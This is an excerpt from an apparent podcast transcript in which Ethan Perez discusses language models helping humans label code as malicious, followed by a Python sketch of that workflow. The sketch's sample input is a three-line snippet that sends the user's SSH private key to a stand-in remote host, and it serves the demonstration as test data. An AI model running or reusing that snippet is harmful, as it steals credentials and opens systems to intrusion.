
Ethan Perez – Inverse Scaling, Language Feedback, Red Teaming

The Inside View


Is the Output Malicious or Not?

In a lot of cases, that might be the case, if human judgment is reliable. We can have something like, you know, we're looking at some piece of code and trying to figure out: is this malicious or not? And we have a language model that's, like, pair programming with us. And then, with that tool, we might be better positioned to produce accurate labels for whether an output is harmful or not.
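For concreteness, here is a minimal sketch of the kind of LM-assisted labeling described above: the model explains a code snippet and flags suspicious behavior, and the human uses that analysis to produce the final label. The `query_model` helper is a hypothetical placeholder, not an API from the episode.

```python
# Minimal sketch (not from the episode) of LM-assisted labeling:
# a language model acts as a "pair programmer," surfacing observations
# about a code snippet so the human makes a better-informed final call.

def query_model(prompt: str) -> str:
    """Placeholder LM call; swap in a real API client here."""
    return (
        "The script opens a network socket and uploads the contents "
        "of the user's SSH directory to a remote host."
    )

def assisted_label(code_snippet: str) -> str:
    # Ask the model to explain the code and flag anything suspicious.
    analysis = query_model(
        "Explain what this code does and flag anything potentially "
        "malicious (e.g., data exfiltration, obfuscation):\n\n"
        + code_snippet
    )
    print("Model analysis:\n" + analysis + "\n")
    # The human reviews the analysis and produces the final label.
    return input("Label (malicious/benign): ").strip().lower()

if __name__ == "__main__":
    snippet = (
        "import socket, pathlib\n"
        "s = socket.create_connection(('203.0.113.5', 4444))\n"
        "s.sendall(pathlib.Path('~/.ssh/id_rsa').expanduser().read_bytes())\n"
    )
    print("Human label:", assisted_label(snippet))
```

The key design point is that the model never assigns the label itself; it only supplies an analysis that makes the human's judgment more reliable.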
